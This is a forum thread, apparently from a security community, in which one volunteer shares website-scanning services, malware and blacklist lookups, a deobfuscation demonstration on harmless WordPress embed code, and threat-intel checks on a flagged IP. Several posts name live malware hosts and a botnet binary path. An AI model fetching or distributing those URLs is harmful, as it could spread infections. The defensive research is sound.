Post by: polonus on November 24, 2018, 10:32:03 PM
Website scan sites come and go.

We lost asafaweb scan, which has reached End of Life.
Interesting website scanner is UpGuard Cloud Scanner: https://webscan.upguard.com/#/
Website Health Check: https://webscan.foregenix.com/
WebScan: https://www.htbridge.com/websec/

Some things lost, some things gained,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 24, 2018, 11:35:19 PM
Just to present you with the results of above mentioned scanners for and on this next website
->  https://urlquery.net/report/ea1db0cd-562a-43f3-811a-15464bac12f9
We will see various issues on security check-ups here: https://webscan.upguard.com/#/http://passmcsa.com
Bad security headers in Word Press detected: https://webscan.foregenix.com/webscan_results.html?scanid=e65cd8d6_06cb_4230_80f0_5d258de9d5ef
F-grade test result: https://www.htbridge.com/websec/?id=DZMx7uMz
Of course we have to add specific Word Press check results": user enumeration not disabled and directory listing not disabled via
https://hackertarget.com/wordpress-security-scan/ 
and 1 vuln. jQuery library to be retired -> https://retire.insecurity.today/#!/scan/7ee81e4693c6039d7b6b0debe1cc68c908ddd9a7c36e7a014a22b3a68a12a52d

Interesting on website is that we found that the bootstrap code was altered (there were recent bug errors),
at a final note this scan qualifying the website as clean: https://quttera.com/detailed_report/passmcsa.com
but what's that verdict worth in the light of all security recommendations web admins had better heed,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 05, 2018, 12:53:52 AM
Searching for a particular malware: Example:
Old info and probably not reliable:
https://www.experts-exchange.com/questions/22038431/Virus-on-computerthat-symantec-cannot-remove.html
A reliable source: https://www.threatcrowd.org/listMalware.php?page=55&antivirus=TrojW
and also: https://www.threatcrowd.org/listMalware.php?page=33&antivirus=FakeMS
and also: http://zerocert.org/?code=9d2f0e2260b7c643b043b2ea87b24747110cf9812ea17f51e5645c3f37b3e94c
On a specific domain: https://urlscan.io/domain/count18.51yes.com
and also: https://www.virustotal.com/#/domain/count18.51yes.com
All starting from: https://urlquery.net/report/7451855c-f83c-40f7-92aa-79f0566371f1

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 05, 2018, 05:08:31 PM
Is your IP or host address blaclisted : http://www.anti-abuse.org/multi-rbl-check/
or here: https://whatismyipaddress.com/blacklist-check
or: https://mxtoolbox.com/blacklists.aspx

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 16, 2018, 04:01:35 PM
Several checks on websites being malicious:
https://keystonesolutions.io/solutions/lookup-potentially-malicious-websites/

Interesting background information: https://www.securityskeptic.com/malware/

Malware prevention: http://malwaredomains.lehigh.edu/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 16, 2018, 04:53:43 PM
Checking on malware information (for security researchers only):

Queried because of : https://urlquery.net/report/7e9093e0-7fae-40c8-9f42-014f156fca2d
report here: https://www.malwareurl.com/listing.php?domain=addictive.de
http://www.urlvir.com/search-host/addictive.de/
Also consider the informative scan results here: https://www.htbridge.com/websec/?id=4yPpdRiU

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 23, 2018, 09:39:58 PM
Sometimes we feel the need to do a scan on an AS.
Example to start from - https://urlquery.net/report/1891ca82-d335-448a-8862-614508466d7a
On that particular AS -> https://www.peeringdb.com/net/308
re: https://radar.qrator.net/as4134
re: http://www.cidr-report.org/cgi-bin/as-report?as=AS4134
re: https://www.spamhaus.org/statistics/botnet-asn/
background info: https://bgpmon.net/chinese-isp-hijacked-10-of-the-internet/
on botnet activity: https://zeustracker.abuse.ch/monitor.php?as=4134
re: https://isc.sans.edu/asreport.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 26, 2018, 03:40:51 PM
Various block lists of attack IP's: example IP:
https://www.abuseipdb.com/check/129.204.34.155
https://report.cs.rutgers.edu/mrtg/drop/dropstat.cgi?start=-1h
https://www.binarydefense.com/banlist.txt?__hstc=103210719.1bb630f9cde2cb5f07430159d50a3c91.1538179200074.1538179200075.1538179200076.1&__hssc=103210719.1.1538179200077&__hsfp=2025384311
https://www.axarva.co.id/blacklist-ip/blocklist.rsc
http://www.eventreader.com/firegen_malicious_ips.txt

Nice resources, enjoy, my good friends, enjoy!

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 22, 2019, 05:07:55 PM
L.S.

See what malware sites were being reported to URLhaus lately: https://urlhaus.abuse.ch/browse/
Before being taken down by providers, some stay active for over a week and can infect a great many devices with malware.

In the case of Chinese malware sites, Chinese providers are known to react rather slow, some malcode may stay on for over a month. They shouldn't be that lax. Domination on malware is not a thing to be proud of.  ;)

URLhaus with 256 researchers over the last 10 month achieved to have a 100.000 websites being taken down.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 22, 2019, 05:56:26 PM
Example of such a blacklisted site been taken down: https://urlhaus.abuse.ch/url/107430/
See: Web Server:
None
X-Powered-By:
None
IP Address:
69.90.66.40
Hosting Provider:
Cogeco Peer 1  -> https://www.privacyshield.gov/participant?id=a2zt0000000TNvtAAG&status=Active
Shared Hosting:
3 sites found on 69.90.66.40

Clean-up needed: https://sitecheck.sucuri.net/results/tekacars.com/wp-content

Re: http://69.90.66.40/cgi-sys/defaultwebpage.cgi  not secure.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 25, 2019, 05:54:30 PM
Stumbled upon this scam tester: https://www.scamner.com/latest
Could be checked also against scams at https://www.urlvoid.com/
and here: https://www.siteprice.org/tools/AdultWebsiteChecker.aspx

enjoy my friends, enjoy

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 03, 2019, 06:57:04 PM
Quite a selection of website scanners:
https://keystonesolutions.io/solutions/lookup-potentially-malicious-websites/
to look up potentially malicious websites.

Example looked up on PHISHCheck from here: wXw.hannahsartistcorner.com  -> https://www.threatminer.org/domain.php?q=www.hannahsartistcorner.com  delivering result
Quote
{"sid": 177823, "is_success": true}

Google Safebrowsing alerts for such sites like htxps://uprisefest.com/images/account/index.php with a security error,
which is being reported to PHISHTank. 
100% given as malicious here: https://zulu.zscaler.com/submission/9067b9f4-3f64-46e4-8200-a2bfe3262741

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 05, 2019, 12:10:51 AM
Different days for first time detections, are they being reported independantly?

Re: https://urlhaus.abuse.ch/url/117199/   &  https://otx.alienvault.com/indicator/domain/vektorex.com
Also see external sources given there...

Our forum friend, Pondus, always being very accurate on the most recent VT results.  ;) Thank you, Pondus.

Here they'd come up with 'three days ago': https://www.virustotal.com/nl/file/199a431e655b6890e3641cda8a98cdaa5c9e4c79303aa734f1ad05eb7ba6b01c/analysis/1549019095/

and this was only yesterday: https://www.virustotal.com/nl/domain/vektorex.com/information/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 14, 2019, 09:38:35 PM
Hole in Word Press plug-ins.
A listing of vulnerable plug-ins from various resources:
https://firstsiteguide.com/tools/free-fsg/hacked-dangerous-vulnerable-wordpress-plugins/#bad_plugins

To get recommendations and tipts to improve websites, scan: https://webhint.io/scanner/ & https://webscan.upguard.com/

Specifically for a quick and dirty on Word Press CMS: https://hackertarget.com/wordpress-security-scan/

Or use retire.js as a Google Chrome/Brave 1.0/ extension: https://chrome.google.com/webstore/detail/retirejs/moibopkbhjceeedibkbkbchbjnkadmom

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 15, 2019, 06:39:36 PM
Background of malware injecting script IP: https://urlquery.net/report/c843e000-63ab-4175-8cd4-864427eeabc3
See: https://www.virustotal.com/fr/url/dab0812fe89ebcac05a3f37cbad6effaa06802bf91b00535ae789f8d05096aa2/analysis/1528944320/
and https://www.polaris64.net/blog/cyber-security/2017/wordpress-hacks-jquery-js-script-injection
and https://otx.alienvault.com/indicator/ip/134.249.116.78
and https://cymon.io/134.249.116.78   
and https://malwarebreakdown.com/2017/04/18/hacked-sites-redirecting-users-to-various-malvertising-campaigns/
How to find the backdoor: https://wordpress.stackexchange.com/questions/256050/how-to-find-the-backdoor-of-the-hack
Re: https://www.ip-finder.me/134.249.116.78/  Your IP 172.69.54.30 has been blacklisted!
and https://www.quicksilk.com/blog/1/checkpoint-10000-hacked-wordpress-sites
and https://productforums.google.com/forum/#!topic/webmasters/02BijAFd9n4
check: https://services.normshield.com/blacklist/ip/134.249.116.78

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 21, 2019, 08:05:08 PM
Resources for vulnerabilities. Example outdated vulnerable Word Press plug-in:
https://publicwww.com/websites/wp-pagenavi+2.92/

wp-pagenavi 2.92   latest release (2.93) Update required
https://lesterchan.net/portfolio/programming/php/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 26, 2019, 11:51:57 PM
Handy online tool for the javascript analyst (use with discern and always play nice):.

A good online deobfuscator of javascript: https://www.dcode.fr/javascript-unobfuscator
Proof of the pudding - "probieren geht ueber studieren":

Some harmless obfuscated code like wp-embed.min.js?ver=4.9.9
Quote
var _0x9024=["\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74","\x4D\x53\x49\x45\x20\x31\x30","\x69\x6E\x64\x65\x78\x4F\x66","\x61\x70\x70\x56\x65\x72\x73\x69\x6F\x6E","\x6D\x61\x74\x63\x68","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x69\x66\x72\x61\x6D\x65\x2E\x77\x70\x2D\x65\x6D\x62\x65\x64\x64\x65\x64\x2D\x63\x6F\x6E\x74\x65\x6E\x74","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C","\x6C\x65\x6E\x67\x74\x68","\x64\x61\x74\x61\x2D\x73\x65\x63\x72\x65\x74","\x67\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x73\x75\x62\x73\x74\x72","\x72\x61\x6E\x64\x6F\x6D","\x73\x72\x63","\x23\x3F\x73\x65\x63\x72\x65\x74\x3D","\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x63\x6C\x6F\x6E\x65\x4E\x6F\x64\x65","\x73\x65\x63\x75\x72\x69\x74\x79","\x72\x65\x6D\x6F\x76\x65\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x72\x65\x70\x6C\x61\x63\x65\x43\x68\x69\x6C\x64","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x77\x70","\x72\x65\x63\x65\x69\x76\x65\x45\x6D\x62\x65\x64\x4D\x65\x73\x73\x61\x67\x65","\x64\x61\x74\x61","\x73\x65\x63\x72\x65\x74","\x6D\x65\x73\x73\x61\x67\x65","\x76\x61\x6C\x75\x65","\x74\x65\x73\x74","\x69\x66\x72\x61\x6D\x65\x5B\x64\x61\x74\x61\x2D\x73\x65\x63\x72\x65\x74\x3D\x22","\x22\x5D","\x62\x6C\x6F\x63\x6B\x71\x75\x6F\x74\x65\x5B\x64\x61\x74\x61\x2D\x73\x65\x63\x72\x65\x74\x3D\x22","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x6E\x6F\x6E\x65","\x73\x6F\x75\x72\x63\x65","\x63\x6F\x6E\x74\x65\x6E\x74\x57\x69\x6E\x64\x6F\x77","\x68\x65\x69\x67\x68\x74","\x6C\x69\x6E\x6B","\x61","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x68\x72\x65\x66","\x68\x6F\x73\x74","\x61\x63\x74\x69\x76\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x6F\x70","\x44\x4F\x4D\x43\x6F\x6E\x74\x65\x6E\x74\x4C\x6F\x61\x64\x65\x64","\x6C\x6F\x61\x64"];!function(_0x9312x1,_0x9312x2){_0x9024[0];function _0x9312x3(){if(!_0x9312x9){_0x9312x9=  !0;var _0x9312x1,_0x9312x3,_0x9312x4,_0x9312x5,_0x9312x6=-1!== navigator[_0x9024[3]][_0x9024[2]](_0x9024[1]),_0x9312x7=!!navigator[_0x9024[5]][_0x9024[4]](/Trident.*rv:11\./),_0x9312x8=_0x9312x2[_0x9024[7]](_0x9024[6]);for(_0x9312x3= 0;_0x9312x3< _0x9312x8[_0x9024[8]];_0x9312x3++){if(_0x9312x4= _0x9312x8[_0x9312x3],!_0x9312x4[_0x9024[10]](_0x9024[9])){_0x9312x5= Math[_0x9024[12]]().toString(36)[_0x9024[11]](2,10),_0x9312x4[_0x9024[13]]+= _0x9024[14]+ _0x9312x5,_0x9312x4[_0x9024[15]](_0x9024[9],_0x9312x5)};if(_0x9312x6|| _0x9312x7){_0x9312x1= _0x9312x4[_0x9024[16]](!0),_0x9312x1[_0x9024[18]](_0x9024[17]),_0x9312x4[_0x9024[20]][_0x9024[19]](_0x9312x1,_0x9312x4)}}}}var _0x9312x4=!1,_0x9312x9=!1;if(_0x9312x2[_0x9024[21]]){if(_0x9312x1[_0x9024[22]]){_0x9312x4=  !0}};if(_0x9312x1[_0x9024[23]]= _0x9312x1[_0x9024[23]]|| {},!_0x9312x1[_0x9024[23]][_0x9024[24]]){if(_0x9312x1[_0x9024[23]][_0x9024[24]]= function(_0x9312x3){var _0x9312x4=_0x9312x3[_0x9024[25]];if(_0x9312x4){if(_0x9312x4[_0x9024[26]]|| _0x9312x4[_0x9024[27]]|| _0x9312x4[_0x9024[28]]){if(!/[^a-zA-Z0-9]/[_0x9024[29]](_0x9312x4[_0x9024[26]])){var _0x9312x9,_0x9312x5,_0x9312x6,_0x9312x7,_0x9312x8,_0x9312xa=_0x9312x2[_0x9024[7]](_0x9024[30]+ _0x9312x4[_0x9024[26]]+ _0x9024[31]),_0x9312xb=_0x9312x2[_0x9024[7]](_0x9024[32]+ _0x9312x4[_0x9024[26]]+ _0x9024[31]);for(_0x9312x9= 0;_0x9312x9< _0x9312xb[_0x9024[8]];_0x9312x9++){_0x9312xb[_0x9312x9][_0x9024[34]][_0x9024[33]]= _0x9024[35]};for(_0x9312x9= 0;_0x9312x9< _0x9312xa[_0x9024[8]];_0x9312x9++){if(_0x9312x5= _0x9312xa[_0x9312x9],_0x9312x3[_0x9024[36]]=== _0x9312x5[_0x9024[37]]){if(_0x9312x5[_0x9024[18]](_0x9024[34]),_0x9024[38]=== _0x9312x4[_0x9024[27]]){if(_0x9312x6= parseInt(_0x9312x4[_0x9024[28]],10),_0x9312x6> 1e3){_0x9312x6= 1e3}else {if(~~_0x9312x6< 200){_0x9312x6= 200}};_0x9312x5[_0x9024[38]]= _0x9312x6};if(_0x9024[39]=== _0x9312x4[_0x9024[27]]){if(_0x9312x7= _0x9312x2[_0x9024[41]](_0x9024[40]),_0x9312x8= _0x9312x2[_0x9024[41]](_0x9024[40]),_0x9312x7[_0x9024[42]]= _0x9312x5[_0x9024[10]](_0x9024[13]),_0x9312x8[_0x9024[42]]= _0x9312x4[_0x9024[28]],_0x9312x8[_0x9024[43]]=== _0x9312x7[_0x9024[43]]){if(_0x9312x2[_0x9024[44]]=== _0x9312x5){_0x9312x1[_0x9024[46]][_0x9024[45]][_0x9024[42]]= _0x9312x4[_0x9024[28]]}}}}else {;}}}}}},_0x9312x4){_0x9312x1[_0x9024[22]](_0x9024[27],_0x9312x1[_0x9024[23]][_0x9024[24]],!1),_0x9312x2[_0x9024[22]](_0x9024[47],_0x9312x3,!1),_0x9312x1[_0x9024[22]](_0x9024[48],_0x9312x3,!1)}}}(window,document)

original code that came out, result
Quote
'use strict';
var _0x9024 = ["use strict", "MSIE 10", "indexOf", "appVersion", "match", "userAgent", "iframe.wp-embedded-content", "querySelectorAll", "length", "data-secret", "getAttribute", "substr", "random", "src", "#?secret=", "setAttribute", "cloneNode", "security", "removeAttribute", "replaceChild", "parentNode", "querySelector", "addEventListener", "wp", "receiveEmbedMessage", "data", "secret", "message", "value", "test", 'iframe[data-secret="', '"]', 'blockquote[data-secret="', "display", "style", "none",
"source", "contentWindow", "height", "link", "a", "createElement", "href", "host", "activeElement", "location", "top", "DOMContentLoaded", "load"];
!function(_0x9312x1$jscomp$0, _0x9312x2$jscomp$0) {
function _0x9312x3$jscomp$0() {
if (!_0x9312x9$jscomp$0) {
_0x9312x9$jscomp$0 = true;
var _0x9312x1$jscomp$1;
var _0x9312x3$jscomp$1;
var _0x9312x4$jscomp$1;
var _0x9312x5$jscomp$0;
var _0x9312x6$jscomp$0 = -1 !== navigator[_0x9024[3]][_0x9024[2]](_0x9024[1]);
var _0x9312x7$jscomp$0 = !!navigator[_0x9024[5]][_0x9024[4]](/Trident.*rv:11\./);
var _0x9312x8$jscomp$0 = _0x9312x2$jscomp$0[_0x9024[7]](_0x9024[6]);
_0x9312x3$jscomp$1 = 0;
for (; _0x9312x3$jscomp$1 < _0x9312x8$jscomp$0[_0x9024[8]]; _0x9312x3$jscomp$1++) {
if (_0x9312x4$jscomp$1 = _0x9312x8$jscomp$0[_0x9312x3$jscomp$1], !_0x9312x4$jscomp$1[_0x9024[10]](_0x9024[9])) {
_0x9312x5$jscomp$0 = Math[_0x9024[12]]().toString(36)[_0x9024[11]](2, 10);
_0x9312x4$jscomp$1[_0x9024[13]] += _0x9024[14] + _0x9312x5$jscomp$0;
_0x9312x4$jscomp$1[_0x9024[15]](_0x9024[9], _0x9312x5$jscomp$0);
}
if (_0x9312x6$jscomp$0 || _0x9312x7$jscomp$0) {
_0x9312x1$jscomp$1 = _0x9312x4$jscomp$1[_0x9024[16]](true);
_0x9312x1$jscomp$1[_0x9024[18]](_0x9024[17]);
_0x9312x4$jscomp$1[_0x9024[20]][_0x9024[19]](_0x9312x1$jscomp$1, _0x9312x4$jscomp$1);
}
}
}
}
_0x9024[0];
var _0x9312x4$jscomp$0 = false;
var _0x9312x9$jscomp$0 = false;
if (_0x9312x2$jscomp$0[_0x9024[21]]) {
if (_0x9312x1$jscomp$0[_0x9024[22]]) {
_0x9312x4$jscomp$0 = true;
}
}
if (_0x9312x1$jscomp$0[_0x9024[23]] = _0x9312x1$jscomp$0[_0x9024[23]] || {}, !_0x9312x1$jscomp$0[_0x9024[23]][_0x9024[24]]) {
if (_0x9312x1$jscomp$0[_0x9024[23]][_0x9024[24]] = function(_0x9312x3$jscomp$2) {
var _0x9312x4$jscomp$2 = _0x9312x3$jscomp$2[_0x9024[25]];
if (_0x9312x4$jscomp$2) {
if (_0x9312x4$jscomp$2[_0x9024[26]] || _0x9312x4$jscomp$2[_0x9024[27]] || _0x9312x4$jscomp$2[_0x9024[28]]) {
if (!/[^a-zA-Z0-9]/[_0x9024[29]](_0x9312x4$jscomp$2[_0x9024[26]])) {
var _0x9312x9$jscomp$1;
var _0x9312x5$jscomp$1;
var _0x9312x6$jscomp$1;
var _0x9312x7$jscomp$1;
var _0x9312x8$jscomp$1;
var _0x9312xa$jscomp$0 = _0x9312x2$jscomp$0[_0x9024[7]](_0x9024[30] + _0x9312x4$jscomp$2[_0x9024[26]] + _0x9024[31]);
var _0x9312xb$jscomp$0 = _0x9312x2$jscomp$0[_0x9024[7]](_0x9024[32] + _0x9312x4$jscomp$2[_0x9024[26]] + _0x9024[31]);
_0x9312x9$jscomp$1 = 0;
for (; _0x9312x9$jscomp$1 < _0x9312xb$jscomp$0[_0x9024[8]]; _0x9312x9$jscomp$1++) {
_0x9312xb$jscomp$0[_0x9312x9$jscomp$1][_0x9024[34]][_0x9024[33]] = _0x9024[35];
}
_0x9312x9$jscomp$1 = 0;
for (; _0x9312x9$jscomp$1 < _0x9312xa$jscomp$0[_0x9024[8]]; _0x9312x9$jscomp$1++) {
if (_0x9312x5$jscomp$1 = _0x9312xa$jscomp$0[_0x9312x9$jscomp$1], _0x9312x3$jscomp$2[_0x9024[36]] === _0x9312x5$jscomp$1[_0x9024[37]]) {
if (_0x9312x5$jscomp$1[_0x9024[18]](_0x9024[34]), _0x9024[38] === _0x9312x4$jscomp$2[_0x9024[27]]) {
if (_0x9312x6$jscomp$1 = parseInt(_0x9312x4$jscomp$2[_0x9024[28]], 10), _0x9312x6$jscomp$1 > 1e3) {
_0x9312x6$jscomp$1 = 1e3;
} else {
if (~~_0x9312x6$jscomp$1 < 200) {
_0x9312x6$jscomp$1 = 200;
}
}
_0x9312x5$jscomp$1[_0x9024[38]] = _0x9312x6$jscomp$1;
}
if (_0x9024[39] === _0x9312x4$jscomp$2[_0x9024[27]]) {
if (_0x9312x7$jscomp$1 = _0x9312x2$jscomp$0[_0x9024[41]](_0x9024[40]), _0x9312x8$jscomp$1 = _0x9312x2$jscomp$0[_0x9024[41]](_0x9024[40]), _0x9312x7$jscomp$1[_0x9024[42]] = _0x9312x5$jscomp$1[_0x9024[10]](_0x9024[13]), _0x9312x8$jscomp$1[_0x9024[42]] = _0x9312x4$jscomp$2[_0x9024[28]], _0x9312x8$jscomp$1[_0x9024[43]] === _0x9312x7$jscomp$1[_0x9024[43]]) {
if (_0x9312x2$jscomp$0[_0x9024[44]] === _0x9312x5$jscomp$1) {
_0x9312x1$jscomp$0[_0x9024[46]][_0x9024[45]][_0x9024[42]] = _0x9312x4$jscomp$2[_0x9024[28]];
}
}
}
} else {
}
}
}
}
}
}, _0x9312x4$jscomp$0) {
_0x9312x1$jscomp$0[_0x9024[22]](_0x9024[27], _0x9312x1$jscomp$0[_0x9024[23]][_0x9024[24]], false);
_0x9312x2$jscomp$0[_0x9024[22]](_0x9024[47], _0x9312x3$jscomp$0, false);
_0x9312x1$jscomp$0[_0x9024[22]](_0x9024[48], _0x9312x3$jscomp$0, false);
}
}
}(window, document);

Also a good read for researchers of bad code: http://relentless-coding.org/projects/jsdetox/samples
Project: https://javadeobfuscator.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 28, 2019, 12:25:28 AM
Do a connection test: http://conn.internet.nl/connection/

and a good DNS domain check site: https://www.uptrends.com/de/tools/dns

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 28, 2019, 04:06:50 PM
Spectre is going to haunt us for some considerable time: https://arxiv.org/abs/1902.05178

Is your browser vulnerable to Spectre?

Check online: https://xlab.tencent.com/special/spectre/spectre_check.html

According to their checking my browser, it is NOT vulnerable to Spectre  :)
Title: Re: Tests and other Media topics
Post by: polonus on March 02, 2019, 05:21:58 PM
Checking a URLHaus flagged IP, like this one: https://urlhaus.abuse.ch/url/149963/
Interesting information at shodan's,  about ports, services, vulnerabilities:
https://www.shodan.io/host/157.230.214.179
Via additional insights we landed here: https://viz.greynoise.io/ip/157.230.214.179
Quote
Name    Category    Intention    Confidence    First Seen    Last Updated
ZMAP_CLIENT   tool   Null   high   2019-02-26   2019-02-26
SSH_SCANNER_LOW   activity   Null   low   2019-02-26   2019-02-26
TELNET_SCANNER_HIGH   activity   Null   high   2019-02-23   2019-02-23
TELNET_BRUTEFORCER   worm   malicious   high   2019-02-18   2019-02-23
TELNET_BRUTEFORCER   worm   malicious   high   2019-02-18   2019-02-18
TELNET_SCANNER_HIGH   activity   Null   high   2019-02-18   2019-02-18
TELNET_WORM_HIGH   worm   malicious   high   2019-02-11   2019-02-12
TELNET_SCANNER_HIGH   activity   Null   high   2019-02-11   2019-02-12
ZMAP_CLIENT   tool   Null   high   2019-02-11   2019-02-11

See security issues: https://webscan.upguard.com/#/http://157.230.214.179/bins/apep.x86
(5) Susceptible to man-in-the-middle attacks
Server information header exposed
Exposing information about the server version increases the ability of attackers to exploit certain vulnerabilities. The website configuration should be changed to prevent version information being revealed in the 'server' header.
EXPECTED:
[does not contain version number]
FOUND:
Apache/2.2.15 (CentOS)

 Unnecessary open ports
File sharing ports open
Administration ports open
Database ports open

4 recommendations for improvement: https://webhint.io/scanner/78d6da89-0627-4623-b8ec-791b36e0cb5e
This low number of issues could lead to the assumption website was specifically created to abuse...

Unable to connect here: https://observatory.mozilla.org/analyze/157.230.214.179#ssh
Also consider this info: https://dazzlepod.com/ip/?ip_address=http%3A%2F%2F157.230.214.179 *
and this: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=MTU3LjIzMC4yMTQuMTc5~enc

Finally the VT results: Kaspersky detect: https://www.virustotal.com/#/url/8ae84bf6f178a29649f2aaf6d00e5382783921d1b2b40acd6f5fbdb64f089833/detection
Avast detects here: https://www.virustotal.com/#/file/d221870a49a0ab336dfa7d9387add53443e0a6a8ca4c0b6851830fb9d7652bfa/detection

IP scan downloaded files: https://www.virustotal.com/#/ip-address/157.230.214.179

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)

* All info from scans like these cannot and should not be used against the particular websites in question, this is offensive conduct.

Damian
Title: Re: Tests and other Media topics
Post by: polonus on March 02, 2019, 05:32:10 PM
Dr.Web Security Space does not flag it...

Here it is not listed: Checking: -http://157.230.214.179/bins/apep.x86
Engine version: 7.0.34.11020
Total virus-finding records: 7513830
File size: 83.06 KB
File MD5: 3802fd9b541c4711d683408def246be2

-http://157.230.214.179/bins/apep.x86 - Ok (So actually Not OK).

Also checked here:
Quote
IP Address Information
Analysis Date   2019-03-02 11:30:42
Elapsed Time   4 seconds
Blacklist Status   BLACKLISTED 7/114
IP Address   157.230.214.179 Find Sites | IP Whois
Reverse DNS   Unknown
ASN   AS14061
ASN Owner   DigitalOcean, LLC
ISP   Digital Ocean
Continent   North America
Country Code   Flag (US) United States
Latitude / Longitude   40.7185 / -74.0025 Google Map
City   New York
Region   New York
IP Blacklist Report
Engine   Help
BlockedServersRBL    More info
 CBL_AbuseAt    More info
 MegaRBL    More info
 S5hbl    More info
 SURBL    More info
 AlienVault Reputation    More info
 IPSpamList    More info
Bold have it flagged...
 Anti-Attacks BL    More info
 AntiSpam_by_CleanTalk    More info
 Autoshun    More info
 Backscatterer    More info
 BadIPs    More info
 Bambenek Consulting    More info
 Barracuda_Reputation_B...    More info
 BBcan177 (pfBlockerNG)    More info
 BinaryDefense Ban List    More info
 Blacklists_co    More info
 Blocklist.net.ua    More info
 BlockList_de    More info
 BloggingFusion BL    More info
 BlogSpamBL    More info
 Bogons_Team_Cymru    More info
 Booru BL    More info
 Botvrij.eu    More info
 Brute Force Blocker    More info
 Bytefarm_ch IP BL    More info
 C-APT-ure    More info
 CERT.gov.ge    More info
 CERT-PA    More info
 Charles Haley    More info
 CI Army List    More info
 CSpace Hostings IP BL    More info
 Cybercrime-tracker.net    More info
 CyberCure    More info
 Darklist.de    More info
 DataPlane.org    More info
 DNSBL_AbuseCH    More info
 DroneBL    More info
 EFnet_RBL    More info
 EmergingThreats    More info
 Ens160 SSH BL    More info
 Etnetera BL    More info
 Feodo Tracker    More info
 FSpamList    More info
 GPF DNS Block List    More info
 GreenSnow Blocklist    More info
 ImproWare Antispam    More info
 InterServer IP List    More info
 IPSum    More info
 Ip-finder.me    More info
 JustSpam_org    More info
 LAPPS Grid Blacklist    More info
 LashBack UBL    More info
 Log.Onoh.Info    More info
 Malc0de    More info
 MalwareDomainList    More info
 Matapala_org FW Log    More info
 MaxMind High Risk IPs    More info
 MKXT_NET SSH BL    More info
 Migniot SSH Bullies    More info
 Ms-ds-violation-ips    More info
 Myip.ms Blacklist    More info
 NEU SSH Black list    More info
 NiX_Spam    More info
 NoIntegrity BL    More info
 NordSpam    More info
 NoThink.org    More info
 Olegon Blocked IPs    More info
 Organized Villainy Sea...    More info
 Peter-s NUUG IP BL    More info
 PlonkatronixBL    More info
 PhishTank    More info
 Pofon_foobar_hu    More info
 ProjectHoneypot    More info
 PSBL    More info
 Ransomware Tracker    More info
 Redstout Threat IP lis...    More info
 Reuteras Scanning List...    More info
 Roquesor BL    More info
 Rutgers Drop List    More info
 S.S.S.H.I.A    More info
 SANYALnet Labs Mirai I...    More info
 Sblam    More info
 Scientific_Spam_BL    More info
 SCUMWARE    More info
 Shinmura BL    More info
 Snort IPFilter    More info
 SORBS    More info
 SpamCop    More info
 SpamEatingMonkeyBL    More info
 SpamRATS    More info
 SpyEye Tracker    More info
 SSL Blacklist    More info
 St Dominics Priory Col...    More info
 Stefan Gofferje    More info
 StopForumSpam    More info
 Suomispam_RBL    More info
 Swinog_DNSRBL    More info
 Taichung Education Cen...    More info
 TalosIntel IPFilter    More info
 Threat Crowd    More info
 Threat Sourcing    More info
 ThreatLog    More info
 Turris Greylist    More info
 URIBL    More info
 URLVir    More info
 USTC IP BL    More info
 VirBL    More info
 VXVault    More info
 WebIron_RBL    More info
 Websworld.org    More info
 WPBL    More info
 ZeuS Tracker    More info
 Xtream Codes BL    More info

pol
Title: Re: Tests and other Media topics
Post by: polonus on March 10, 2019, 12:34:58 AM
Two interesting chrome extensions I run inside Brave browser:
Javascript Errors Notifier
also check code by opening page in Browser with developer tools via Ctrl+Shift+I
Detected on this sitehttps://www.ninefornews.nl/
Re: ReferenceError: st_go is not defined
&nbsp;/:4181

Also work Retire.Js extension and on same page it flagged: jquery   1.8.3   Found in https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js
Vulnerability info:
Medium   CVE-2012-6708 11290 Selector interpreted as HTML   
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers
all as retirable jQuery library.

Javascript could be at the root of a lot of malcode trouble, so check and doublecheck always,
especially when developing websites and maintaining websites.

Double check at: jquery   1.8.3   Found in https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js
Vulnerability info:
Medium   CVE-2012-6708 11290 Selector interpreted as HTML   123
Medium   2432 3rd party CORS request may execute CVE-2015-9251   1234
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers

and also at  the security part of the webhint scanner: https://webhint.io/scanner/
or validate here: https://codebeautify.org/jsvalidate

Good hunt, javascript de-buggers,

polonus (volunteer 3rd party cold reconnaissance website security analyzer and webite error-hunter)

P.S. Added is a txt file of messages and alerts in the developer's console for a shodan page,
